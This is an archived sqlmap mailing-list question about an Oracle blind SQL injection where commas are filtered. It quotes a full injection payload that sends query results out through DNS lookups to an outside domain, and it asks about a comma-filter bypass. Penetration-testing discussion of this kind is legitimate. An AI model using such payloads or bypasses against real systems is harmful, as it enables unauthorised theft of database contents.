[sqlmap-users] Oracle data retrieval over DNS
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] Oracle data retrieval over DNS
|
From: Marcell F. <fod...@gm...> - 2013-07-21 13:43:27
|
Heya, Sqlmap identifies an Oracle blind injection point, but commas are filtered so I get no data even when using --dns-domain. Even with --dns-domain there are substrings (,) in query --- AND ASCII(SUBSTRC((SELECT UTL_INADDR.GET_HOST_ADDRESS(CHR(71)||CHR(113)||CHR(80)||CHR(46)||(SELECT RAWTOHEX(SUBSTRC((NVL(CAST(3180 AS VARCHAR(4000)),CHR(32))),1,31)) FROM DUAL)||CHR(46)||CHR(117)||CHR(81)||CHR(117)||CHR(46)||CHR(122)||CHR(117)||CHR(112)||CHR(119)||CHR(101)||CHR(116)||CHR(98)||CHR(49)||CHR(46)||CHR(110)||CHR(111)||CHR(45)||CHR(105)||CHR(112)||CHR(46)||CHR(98)||CHR(105)||CHR(122)) FROM DUAL),8,1))>914 AND (7100=7100) --- Is there a way to do the technique described on this page with sqlmap? http://www.notsosecure.com/folder2/2008/05/24/getting-past-the-comma-in-oracle-sql-injection/ M |
